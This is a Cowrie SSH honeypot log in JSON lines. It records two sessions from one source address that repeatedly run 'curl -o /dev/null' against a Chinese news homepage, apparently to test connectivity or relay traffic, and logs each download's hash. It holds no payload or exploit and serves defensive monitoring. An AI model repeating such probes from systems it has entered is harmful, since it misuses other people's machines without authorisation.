{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.751873Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.774945Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.776066Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.778914Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.781214Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.782368Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.793456Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.819893Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.821116Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.823507Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.824414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.841803Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.850921Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.860172Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.861288Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.863622Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.864672Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.881452Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.885885Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.901535Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.902565Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.906350Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.907248Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.924353Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.935675Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.943965Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.945010Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.947950Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.948854Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.952348Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.960503Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.964432Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.988476Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.993868Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.994851Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:05.997138Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:05.997822Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.006930Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.035555Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.036745Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.040007Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.041243Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.051085Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.054933Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.077410Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.078465Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.082683Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.083571Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.096238Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.115975Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.117078Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.121824Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.122641Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.135446Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.137701Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.155341Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.156504Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.160077Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.165225Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.166131Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.180386Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.194582Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.195654Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.204709Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.205620Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.208395Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.219888Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.235889Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.237233Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.243338Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.244101Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.266870Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.276482Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.278284Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.283855Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.284915Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.311251Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.318437Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.319833Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.323512Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.324368Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.354475Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.359364Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.360287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:06.365633Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:06.367078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
